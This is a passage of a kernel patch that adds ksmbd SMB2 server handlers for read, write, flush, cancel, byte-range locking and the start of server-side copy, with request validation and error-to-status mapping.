++int smb2_read(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_read_req *req;
++	struct smb2_read_rsp *rsp;
++	struct ksmbd_file *fp = NULL;
++	loff_t offset;
++	size_t length, mincount;
++	ssize_t nbytes = 0, remain_bytes = 0;
++	int err = 0;
++	bool is_rdma_channel = false;
++	unsigned int max_read_size = conn->vals->max_read_size;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe read request\n");
++		return smb2_read_pipe(work);
++	}
++
++	if (req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE ||
++	    req->Channel == SMB2_CHANNEL_RDMA_V1) {
++		is_rdma_channel = true;
++		max_read_size = get_smbd_max_read_write_size();
++	}
++
++	if (is_rdma_channel == true) {
++		unsigned int ch_offset = le16_to_cpu(req->ReadChannelInfoOffset);
++
++		if (ch_offset < offsetof(struct smb2_read_req, Buffer)) {
++			err = -EINVAL;
++			goto out;
++		}
++		err = smb2_set_remote_key_for_rdma(work,
++						   (struct smb2_buffer_desc_v1 *)
++						   ((char *)req + ch_offset),
++						   req->Channel,
++						   req->ReadChannelInfoLength);
++		if (err)
++			goto out;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp) {
++		err = -ENOENT;
++		goto out;
++	}
++
++	if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
++		pr_err("Not permitted to read : 0x%x\n", fp->daccess);
++		err = -EACCES;
++		goto out;
++	}
++
++	offset = le64_to_cpu(req->Offset);
++	length = le32_to_cpu(req->Length);
++	mincount = le32_to_cpu(req->MinimumCount);
++
++	if (length > max_read_size) {
++		ksmbd_debug(SMB, "limiting read size to max size(%u)\n",
++			    max_read_size);
++		err = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
++		    fp->filp, offset, length);
++
++	work->aux_payload_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
++	if (!work->aux_payload_buf) {
++		err = -ENOMEM;
++		goto out;
++	}
++
++	nbytes = ksmbd_vfs_read(work, fp, length, &offset);
++	if (nbytes < 0) {
++		err = nbytes;
++		goto out;
++	}
++
++	if ((nbytes == 0 && length != 0) || nbytes < mincount) {
++		kvfree(work->aux_payload_buf);
++		work->aux_payload_buf = NULL;
++		rsp->hdr.Status = STATUS_END_OF_FILE;
++		smb2_set_err_rsp(work);
++		ksmbd_fd_put(work, fp);
++		return 0;
++	}
++
++	ksmbd_debug(SMB, "nbytes %zu, offset %lld mincount %zu\n",
++		    nbytes, offset, mincount);
++
++	if (is_rdma_channel == true) {
++		/* write data to the client using rdma channel */
++		remain_bytes = smb2_read_rdma_channel(work, req,
++						      work->aux_payload_buf,
++						      nbytes);
++		kvfree(work->aux_payload_buf);
++		work->aux_payload_buf = NULL;
++
++		nbytes = 0;
++		if (remain_bytes < 0) {
++			err = (int)remain_bytes;
++			goto out;
++		}
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 80;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(nbytes);
++	rsp->DataRemaining = cpu_to_le32(remain_bytes);
++	rsp->Flags = 0;
++	inc_rfc1001_len(work->response_buf, 16);
++	work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
++	work->aux_payload_sz = nbytes;
++	inc_rfc1001_len(work->response_buf, nbytes);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++out:
++	if (err) {
++		if (err == -EISDIR)
++			rsp->hdr.Status = STATUS_INVALID_DEVICE_REQUEST;
++		else if (err == -EAGAIN)
++			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++		else if (err == -ENOENT)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		else if (err == -EACCES)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (err == -ESHARE)
++			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++		else if (err == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++
++		smb2_set_err_rsp(work);
++	}
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++/**
++ * smb2_write_pipe() - handler for smb2 write on IPC pipe
++ * @work:	smb work containing write IPC pipe command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++static noinline int smb2_write_pipe(struct ksmbd_work *work)
++{
++	struct smb2_write_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_write_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_rpc_command *rpc_resp;
++	u64 id = 0;
++	int err = 0, ret = 0;
++	char *data_buf;
++	size_t length;
++
++	length = le32_to_cpu(req->Length);
++	id = req->VolatileFileId;
++
++	if ((u64)le16_to_cpu(req->DataOffset) + length >
++	    get_rfc1002_len(work->request_buf)) {
++		pr_err("invalid write data offset %u, smb_len %u\n",
++		       le16_to_cpu(req->DataOffset),
++		       get_rfc1002_len(work->request_buf));
++		err = -EINVAL;
++		goto out;
++	}
++
++	data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
++			   le16_to_cpu(req->DataOffset));
++
++	rpc_resp = ksmbd_rpc_write(work->sess, id, data_buf, length);
++	if (rpc_resp) {
++		if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
++			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++			kvfree(rpc_resp);
++			smb2_set_err_rsp(work);
++			return -EOPNOTSUPP;
++		}
++		if (rpc_resp->flags != KSMBD_RPC_OK) {
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++			smb2_set_err_rsp(work);
++			kvfree(rpc_resp);
++			return ret;
++		}
++		kvfree(rpc_resp);
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 0;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(length);
++	rsp->DataRemaining = 0;
++	rsp->Reserved2 = 0;
++	inc_rfc1001_len(work->response_buf, 16);
++	return 0;
++out:
++	if (err) {
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		smb2_set_err_rsp(work);
++	}
++
++	return err;
++}
++
++static ssize_t smb2_write_rdma_channel(struct ksmbd_work *work,
++				       struct smb2_write_req *req,
++				       struct ksmbd_file *fp,
++				       loff_t offset, size_t length, bool sync)
++{
++	char *data_buf;
++	int ret;
++	ssize_t nbytes;
++
++	data_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
++	if (!data_buf)
++		return -ENOMEM;
++
++	ret = ksmbd_conn_rdma_read(work->conn, data_buf, length,
++				   (struct smb2_buffer_desc_v1 *)
++				   ((char *)req + le16_to_cpu(req->WriteChannelInfoOffset)),
++				   le16_to_cpu(req->WriteChannelInfoLength));
++	if (ret < 0) {
++		kvfree(data_buf);
++		return ret;
++	}
++
++	ret = ksmbd_vfs_write(work, fp, data_buf, length, &offset, sync, &nbytes);
++	kvfree(data_buf);
++	if (ret < 0)
++		return ret;
++
++	return nbytes;
++}
++
++/**
++ * smb2_write() - handler for smb2 write from file
++ * @work:	smb work containing write command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_write(struct ksmbd_work *work)
++{
++	struct smb2_write_req *req;
++	struct smb2_write_rsp *rsp;
++	struct ksmbd_file *fp = NULL;
++	loff_t offset;
++	size_t length;
++	ssize_t nbytes;
++	char *data_buf;
++	bool writethrough = false, is_rdma_channel = false;
++	int err = 0;
++	unsigned int max_write_size = work->conn->vals->max_write_size;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe write request\n");
++		return smb2_write_pipe(work);
++	}
++
++	offset = le64_to_cpu(req->Offset);
++	length = le32_to_cpu(req->Length);
++
++	if (req->Channel == SMB2_CHANNEL_RDMA_V1 ||
++	    req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE) {
++		is_rdma_channel = true;
++		max_write_size = get_smbd_max_read_write_size();
++		length = le32_to_cpu(req->RemainingBytes);
++	}
++
++	if (is_rdma_channel == true) {
++		unsigned int ch_offset = le16_to_cpu(req->WriteChannelInfoOffset);
++
++		if (req->Length != 0 || req->DataOffset != 0 ||
++		    ch_offset < offsetof(struct smb2_write_req, Buffer)) {
++			err = -EINVAL;
++			goto out;
++		}
++		err = smb2_set_remote_key_for_rdma(work,
++						   (struct smb2_buffer_desc_v1 *)
++						   ((char *)req + ch_offset),
++						   req->Channel,
++						   req->WriteChannelInfoLength);
++		if (err)
++			goto out;
++	}
++
++	if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++		ksmbd_debug(SMB, "User does not have write permission\n");
++		err = -EACCES;
++		goto out;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp) {
++		err = -ENOENT;
++		goto out;
++	}
++
++	if (!(fp->daccess & (FILE_WRITE_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
++		pr_err("Not permitted to write : 0x%x\n", fp->daccess);
++		err = -EACCES;
++		goto out;
++	}
++
++	if (length > max_write_size) {
++		ksmbd_debug(SMB, "limiting write size to max size(%u)\n",
++			    max_write_size);
++		err = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "flags %u\n", le32_to_cpu(req->Flags));
++	if (le32_to_cpu(req->Flags) & SMB2_WRITEFLAG_WRITE_THROUGH)
++		writethrough = true;
++
++	if (is_rdma_channel == false) {
++		if (le16_to_cpu(req->DataOffset) <
++		    offsetof(struct smb2_write_req, Buffer)) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
++				    le16_to_cpu(req->DataOffset));
++
++		ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
++			    fp->filp, offset, length);
++		err = ksmbd_vfs_write(work, fp, data_buf, length, &offset,
++				      writethrough, &nbytes);
++		if (err < 0)
++			goto out;
++	} else {
++		/* read data from the client using rdma channel, and
++		 * write the data.
++		 */
++		nbytes = smb2_write_rdma_channel(work, req, fp, offset, length,
++						 writethrough);
++		if (nbytes < 0) {
++			err = (int)nbytes;
++			goto out;
++		}
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 0;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(nbytes);
++	rsp->DataRemaining = 0;
++	rsp->Reserved2 = 0;
++	inc_rfc1001_len(work->response_buf, 16);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++out:
++	if (err == -EAGAIN)
++		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++	else if (err == -ENOSPC || err == -EFBIG)
++		rsp->hdr.Status = STATUS_DISK_FULL;
++	else if (err == -ENOENT)
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++	else if (err == -EACCES)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (err == -ESHARE)
++		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++	else if (err == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++/**
++ * smb2_flush() - handler for smb2 flush file - fsync
++ * @work:	smb work containing flush command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_flush(struct ksmbd_work *work)
++{
++	struct smb2_flush_req *req;
++	struct smb2_flush_rsp *rsp;
++	int err;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	ksmbd_debug(SMB, "SMB2_FLUSH called for fid %llu\n", req->VolatileFileId);
++
++	err = ksmbd_vfs_fsync(work, req->VolatileFileId, req->PersistentFileId);
++	if (err)
++		goto out;
++
++	rsp->StructureSize = cpu_to_le16(4);
++	rsp->Reserved = 0;
++	inc_rfc1001_len(work->response_buf, 4);
++	return 0;
++
++out:
++	if (err) {
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		smb2_set_err_rsp(work);
++	}
++
++	return err;
++}
++
++/**
++ * smb2_cancel() - handler for smb2 cancel command
++ * @work:	smb work containing cancel command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_cancel(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++	struct smb2_hdr *chdr;
++	struct ksmbd_work *iter;
++	struct list_head *command_list;
++
++	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
++		    hdr->MessageId, hdr->Flags);
++
++	if (hdr->Flags & SMB2_FLAGS_ASYNC_COMMAND) {
++		command_list = &conn->async_requests;
++
++		spin_lock(&conn->request_lock);
++		list_for_each_entry(iter, command_list,
++				    async_request_entry) {
++			chdr = smb2_get_msg(iter->request_buf);
++
++			if (iter->async_id !=
++			    le64_to_cpu(hdr->Id.AsyncId))
++				continue;
++
++			ksmbd_debug(SMB,
++				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
++				    le64_to_cpu(hdr->Id.AsyncId),
++				    le16_to_cpu(chdr->Command));
++			iter->state = KSMBD_WORK_CANCELLED;
++			if (iter->cancel_fn)
++				iter->cancel_fn(iter->cancel_argv);
++			break;
++		}
++		spin_unlock(&conn->request_lock);
++	} else {
++		command_list = &conn->requests;
++
++		spin_lock(&conn->request_lock);
++		list_for_each_entry(iter, command_list, request_entry) {
++			chdr = smb2_get_msg(iter->request_buf);
++
++			if (chdr->MessageId != hdr->MessageId ||
++			    iter == work)
++				continue;
++
++			ksmbd_debug(SMB,
++				    "smb2 with mid %llu cancelled command = 0x%x\n",
++				    le64_to_cpu(hdr->MessageId),
++				    le16_to_cpu(chdr->Command));
++			iter->state = KSMBD_WORK_CANCELLED;
++			break;
++		}
++		spin_unlock(&conn->request_lock);
++	}
++
++	/* For SMB2_CANCEL command itself send no response*/
++	work->send_no_response = 1;
++	return 0;
++}
++
++struct file_lock *smb_flock_init(struct file *f)
++{
++	struct file_lock *fl;
++
++	fl = locks_alloc_lock();
++	if (!fl)
++		goto out;
++
++	locks_init_lock(fl);
++
++	fl->fl_owner = f;
++	fl->fl_pid = current->tgid;
++	fl->fl_file = f;
++	fl->fl_flags = FL_POSIX;
++	fl->fl_ops = NULL;
++	fl->fl_lmops = NULL;
++
++out:
++	return fl;
++}
++
++static int smb2_set_flock_flags(struct file_lock *flock, int flags)
++{
++	int cmd = -EINVAL;
++
++	/* Checking for wrong flag combination during lock request*/
++	switch (flags) {
++	case SMB2_LOCKFLAG_SHARED:
++		ksmbd_debug(SMB, "received shared request\n");
++		cmd = F_SETLKW;
++		flock->fl_type = F_RDLCK;
++		flock->fl_flags |= FL_SLEEP;
++		break;
++	case SMB2_LOCKFLAG_EXCLUSIVE:
++		ksmbd_debug(SMB, "received exclusive request\n");
++		cmd = F_SETLKW;
++		flock->fl_type = F_WRLCK;
++		flock->fl_flags |= FL_SLEEP;
++		break;
++	case SMB2_LOCKFLAG_SHARED | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
++		ksmbd_debug(SMB,
++			    "received shared & fail immediately request\n");
++		cmd = F_SETLK;
++		flock->fl_type = F_RDLCK;
++		break;
++	case SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
++		ksmbd_debug(SMB,
++			    "received exclusive & fail immediately request\n");
++		cmd = F_SETLK;
++		flock->fl_type = F_WRLCK;
++		break;
++	case SMB2_LOCKFLAG_UNLOCK:
++		ksmbd_debug(SMB, "received unlock request\n");
++		flock->fl_type = F_UNLCK;
++		cmd = 0;
++		break;
++	}
++
++	return cmd;
++}
++
++static struct ksmbd_lock *smb2_lock_init(struct file_lock *flock,
++					 unsigned int cmd, int flags,
++					 struct list_head *lock_list)
++{
++	struct ksmbd_lock *lock;
++
++	lock = kzalloc(sizeof(struct ksmbd_lock), GFP_KERNEL);
++	if (!lock)
++		return NULL;
++
++	lock->cmd = cmd;
++	lock->fl = flock;
++	lock->start = flock->fl_start;
++	lock->end = flock->fl_end;
++	lock->flags = flags;
++	if (lock->start == lock->end)
++		lock->zero_len = 1;
++	INIT_LIST_HEAD(&lock->clist);
++	INIT_LIST_HEAD(&lock->flist);
++	INIT_LIST_HEAD(&lock->llist);
++	list_add_tail(&lock->llist, lock_list);
++
++	return lock;
++}
++
++static void smb2_remove_blocked_lock(void **argv)
++{
++	struct file_lock *flock = (struct file_lock *)argv[0];
++
++	ksmbd_vfs_posix_lock_unblock(flock);
++	wake_up(&flock->fl_wait);
++}
++
++static inline bool lock_defer_pending(struct file_lock *fl)
++{
++	/* check pending lock waiters */
++	return waitqueue_active(&fl->fl_wait);
++}
++
++/**
++ * smb2_lock() - handler for smb2 file lock command
++ * @work:	smb work containing lock command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_lock(struct ksmbd_work *work)
++{
++	struct smb2_lock_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_lock_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_lock_element *lock_ele;
++	struct ksmbd_file *fp = NULL;
++	struct file_lock *flock = NULL;
++	struct file *filp = NULL;
++	int lock_count;
++	int flags = 0;
++	int cmd = 0;
++	int err = -EIO, i, rc = 0;
++	u64 lock_start, lock_length;
++	struct ksmbd_lock *smb_lock = NULL, *cmp_lock, *tmp, *tmp2;
++	struct ksmbd_conn *conn;
++	int nolock = 0;
++	LIST_HEAD(lock_list);
++	LIST_HEAD(rollback_list);
++	int prior_lock = 0;
++
++	ksmbd_debug(SMB, "Received lock request\n");
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp) {
++		ksmbd_debug(SMB, "Invalid file id for lock : %llu\n", req->VolatileFileId);
++		err = -ENOENT;
++		goto out2;
++	}
++
++	filp = fp->filp;
++	lock_count = le16_to_cpu(req->LockCount);
++	lock_ele = req->locks;
++
++	ksmbd_debug(SMB, "lock count is %d\n", lock_count);
++	if (!lock_count) {
++		err = -EINVAL;
++		goto out2;
++	}
++
++	for (i = 0; i < lock_count; i++) {
++		flags = le32_to_cpu(lock_ele[i].Flags);
++
++		flock = smb_flock_init(filp);
++		if (!flock)
++			goto out;
++
++		cmd = smb2_set_flock_flags(flock, flags);
++
++		lock_start = le64_to_cpu(lock_ele[i].Offset);
++		lock_length = le64_to_cpu(lock_ele[i].Length);
++		if (lock_start > U64_MAX - lock_length) {
++			pr_err("Invalid lock range requested\n");
++			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			goto out;
++		}
++
++		if (lock_start > OFFSET_MAX)
++			flock->fl_start = OFFSET_MAX;
++		else
++			flock->fl_start = lock_start;
++
++		lock_length = le64_to_cpu(lock_ele[i].Length);
++		if (lock_length > OFFSET_MAX - flock->fl_start)
++			lock_length = OFFSET_MAX - flock->fl_start;
++
++		flock->fl_end = flock->fl_start + lock_length;
++
++		if (flock->fl_end < flock->fl_start) {
++			ksmbd_debug(SMB,
++				    "the end offset(%llx) is smaller than the start offset(%llx)\n",
++				    flock->fl_end, flock->fl_start);
++			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			goto out;
++		}
++
++		/* Check conflict locks in one request */
++		list_for_each_entry(cmp_lock, &lock_list, llist) {
++			if (cmp_lock->fl->fl_start <= flock->fl_start &&
++			    cmp_lock->fl->fl_end >= flock->fl_end) {
++				if (cmp_lock->fl->fl_type != F_UNLCK &&
++				    flock->fl_type != F_UNLCK) {
++					pr_err("conflict two locks in one request\n");
++					err = -EINVAL;
++					goto out;
++				}
++			}
++		}
++
++		smb_lock = smb2_lock_init(flock, cmd, flags, &lock_list);
++		if (!smb_lock) {
++			err = -EINVAL;
++			goto out;
++		}
++	}
++
++	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
++		if (smb_lock->cmd < 0) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		if (!(smb_lock->flags & SMB2_LOCKFLAG_MASK)) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		if ((prior_lock & (SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_SHARED) &&
++		     smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) ||
++		    (prior_lock == SMB2_LOCKFLAG_UNLOCK &&
++		     !(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK))) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		prior_lock = smb_lock->flags;
++
++		if (!(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) &&
++		    !(smb_lock->flags & SMB2_LOCKFLAG_FAIL_IMMEDIATELY))
++			goto no_check_cl;
++
++		nolock = 1;
++		/* check locks in connection list */
++		down_read(&conn_list_lock);
++		list_for_each_entry(conn, &conn_list, conns_list) {
++			spin_lock(&conn->llist_lock);
++			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
++				if (file_inode(cmp_lock->fl->fl_file) !=
++				    file_inode(smb_lock->fl->fl_file))
++					continue;
++
++				if (smb_lock->fl->fl_type == F_UNLCK) {
++					if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file &&
++					    cmp_lock->start == smb_lock->start &&
++					    cmp_lock->end == smb_lock->end &&
++					    !lock_defer_pending(cmp_lock->fl)) {
++						nolock = 0;
++						list_del(&cmp_lock->flist);
++						list_del(&cmp_lock->clist);
++						spin_unlock(&conn->llist_lock);
++						up_read(&conn_list_lock);
++
++						locks_free_lock(cmp_lock->fl);
++						kfree(cmp_lock);
++						goto out_check_cl;
++					}
++					continue;
++				}
++
++				if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file) {
++					if (smb_lock->flags & SMB2_LOCKFLAG_SHARED)
++						continue;
++				} else {
++					if (cmp_lock->flags & SMB2_LOCKFLAG_SHARED)
++						continue;
++				}
++
++				/* check zero byte lock range */
++				if (cmp_lock->zero_len && !smb_lock->zero_len &&
++				    cmp_lock->start > smb_lock->start &&
++				    cmp_lock->start < smb_lock->end) {
++					spin_unlock(&conn->llist_lock);
++					up_read(&conn_list_lock);
++					pr_err("previous lock conflict with zero byte lock range\n");
++					goto out;
++				}
++
++				if (smb_lock->zero_len && !cmp_lock->zero_len &&
++				    smb_lock->start > cmp_lock->start &&
++				    smb_lock->start < cmp_lock->end) {
++					spin_unlock(&conn->llist_lock);
++					up_read(&conn_list_lock);
++					pr_err("current lock conflict with zero byte lock range\n");
++					goto out;
++				}
++
++				if (((cmp_lock->start <= smb_lock->start &&
++				      cmp_lock->end > smb_lock->start) ||
++				     (cmp_lock->start < smb_lock->end &&
++				      cmp_lock->end >= smb_lock->end)) &&
++				    !cmp_lock->zero_len && !smb_lock->zero_len) {
++					spin_unlock(&conn->llist_lock);
++					up_read(&conn_list_lock);
++					pr_err("Not allow lock operation on exclusive lock range\n");
++					goto out;
++				}
++			}
++			spin_unlock(&conn->llist_lock);
++		}
++		up_read(&conn_list_lock);
++out_check_cl:
++		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
++			pr_err("Try to unlock nolocked range\n");
++			rsp->hdr.Status = STATUS_RANGE_NOT_LOCKED;
++			goto out;
++		}
++
++no_check_cl:
++		if (smb_lock->zero_len) {
++			err = 0;
++			goto skip;
++		}
++
++		flock = smb_lock->fl;
++		list_del(&smb_lock->llist);
++retry:
++		rc = vfs_lock_file(filp, smb_lock->cmd, flock, NULL);
++skip:
++		if (flags & SMB2_LOCKFLAG_UNLOCK) {
++			if (!rc) {
++				ksmbd_debug(SMB, "File unlocked\n");
++			} else if (rc == -ENOENT) {
++				rsp->hdr.Status = STATUS_NOT_LOCKED;
++				goto out;
++			}
++			locks_free_lock(flock);
++			kfree(smb_lock);
++		} else {
++			if (rc == FILE_LOCK_DEFERRED) {
++				void **argv;
++
++				ksmbd_debug(SMB,
++					    "would have to wait for getting lock\n");
++				spin_lock(&work->conn->llist_lock);
++				list_add_tail(&smb_lock->clist,
++					      &work->conn->lock_list);
++				spin_unlock(&work->conn->llist_lock);
++				list_add(&smb_lock->llist, &rollback_list);
++
++				argv = kmalloc(sizeof(void *), GFP_KERNEL);
++				if (!argv) {
++					err = -ENOMEM;
++					goto out;
++				}
++				argv[0] = flock;
++
++				rc = setup_async_work(work,
++						      smb2_remove_blocked_lock,
++						      argv);
++				if (rc) {
++					err = -ENOMEM;
++					goto out;
++				}
++				spin_lock(&fp->f_lock);
++				list_add(&work->fp_entry, &fp->blocked_works);
++				spin_unlock(&fp->f_lock);
++
++				smb2_send_interim_resp(work, STATUS_PENDING);
++
++				ksmbd_vfs_posix_lock_wait(flock);
++
++				spin_lock(&work->conn->request_lock);
++				spin_lock(&fp->f_lock);
++				list_del(&work->fp_entry);
++				work->cancel_fn = NULL;
++				kfree(argv);
++				spin_unlock(&fp->f_lock);
++				spin_unlock(&work->conn->request_lock);
++
++				if (work->state != KSMBD_WORK_ACTIVE) {
++					list_del(&smb_lock->llist);
++					spin_lock(&work->conn->llist_lock);
++					list_del(&smb_lock->clist);
++					spin_unlock(&work->conn->llist_lock);
++					locks_free_lock(flock);
++
++					if (work->state == KSMBD_WORK_CANCELLED) {
++						rsp->hdr.Status =
++							STATUS_CANCELLED;
++						kfree(smb_lock);
++						smb2_send_interim_resp(work,
++								       STATUS_CANCELLED);
++						work->send_no_response = 1;
++						goto out;
++					}
++					init_smb2_rsp_hdr(work);
++					smb2_set_err_rsp(work);
++					rsp->hdr.Status =
++						STATUS_RANGE_NOT_LOCKED;
++					kfree(smb_lock);
++					goto out2;
++				}
++
++				list_del(&smb_lock->llist);
++				spin_lock(&work->conn->llist_lock);
++				list_del(&smb_lock->clist);
++				spin_unlock(&work->conn->llist_lock);
++
++				goto retry;
++			} else if (!rc) {
++				spin_lock(&work->conn->llist_lock);
++				list_add_tail(&smb_lock->clist,
++					      &work->conn->lock_list);
++				list_add_tail(&smb_lock->flist,
++					      &fp->lock_list);
++				spin_unlock(&work->conn->llist_lock);
++				list_add(&smb_lock->llist, &rollback_list);
++				ksmbd_debug(SMB, "successful in taking lock\n");
++			} else {
++				goto out;
++			}
++		}
++	}
++
++	if (atomic_read(&fp->f_ci->op_count) > 1)
++		smb_break_all_oplock(work, fp);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	ksmbd_debug(SMB, "successful in taking lock\n");
++	rsp->hdr.Status = STATUS_SUCCESS;
++	rsp->Reserved = 0;
++	inc_rfc1001_len(work->response_buf, 4);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++out:
++	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
++		locks_free_lock(smb_lock->fl);
++		list_del(&smb_lock->llist);
++		kfree(smb_lock);
++	}
++
++	list_for_each_entry_safe(smb_lock, tmp, &rollback_list, llist) {
++		struct file_lock *rlock = NULL;
++
++		rlock = smb_flock_init(filp);
++		rlock->fl_type = F_UNLCK;
++		rlock->fl_start = smb_lock->start;
++		rlock->fl_end = smb_lock->end;
++
++		rc = vfs_lock_file(filp, 0, rlock, NULL);
++		if (rc)
++			pr_err("rollback unlock fail : %d\n", rc);
++
++		list_del(&smb_lock->llist);
++		spin_lock(&work->conn->llist_lock);
++		if (!list_empty(&smb_lock->flist))
++			list_del(&smb_lock->flist);
++		list_del(&smb_lock->clist);
++		spin_unlock(&work->conn->llist_lock);
++
++		locks_free_lock(smb_lock->fl);
++		locks_free_lock(rlock);
++		kfree(smb_lock);
++	}
++out2:
++	ksmbd_debug(SMB, "failed in taking lock(flags : %x), err : %d\n", flags, err);
++
++	if (!rsp->hdr.Status) {
++		if (err == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else if (err == -ENOMEM)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		else if (err == -ENOENT)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		else
++			rsp->hdr.Status = STATUS_LOCK_NOT_GRANTED;
++	}
++
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++static int fsctl_copychunk(struct ksmbd_work *work,
++			   struct copychunk_ioctl_req *ci_req,
++			   unsigned int cnt_code,
++			   unsigned int input_count,
++			   unsigned long long volatile_id,
++			   unsigned long long persistent_id,
++			   struct smb2_ioctl_rsp *rsp)
++{
++	struct copychunk_ioctl_rsp *ci_rsp;
++	struct ksmbd_file *src_fp = NULL, *dst_fp = NULL;
++	struct srv_copychunk *chunks;
++	unsigned int i, chunk_count, chunk_count_written = 0;
++	unsigned int chunk_size_written = 0;
++	loff_t total_size_written = 0;
++	int ret = 0;
++
++	ci_rsp = (struct copychunk_ioctl_rsp *)&rsp->Buffer[0];
++
++	rsp->VolatileFileId = volatile_id;
++	rsp->PersistentFileId = persistent_id;
++	ci_rsp->ChunksWritten =
++		cpu_to_le32(ksmbd_server_side_copy_max_chunk_count());
++	ci_rsp->ChunkBytesWritten =
++		cpu_to_le32(ksmbd_server_side_copy_max_chunk_size());
++	ci_rsp->TotalBytesWritten =
++		cpu_to_le32(ksmbd_server_side_copy_max_total_size());
++
++	chunks = (struct srv_copychunk *)&ci_req->Chunks[0];
++	chunk_count = le32_to_cpu(ci_req->ChunkCount);
++	if (chunk_count == 0)
++		goto out;
++	total_size_written = 0;
++
++	/* verify the SRV_COPYCHUNK_COPY packet */
++	if (chunk_count > ksmbd_server_side_copy_max_chunk_count() ||
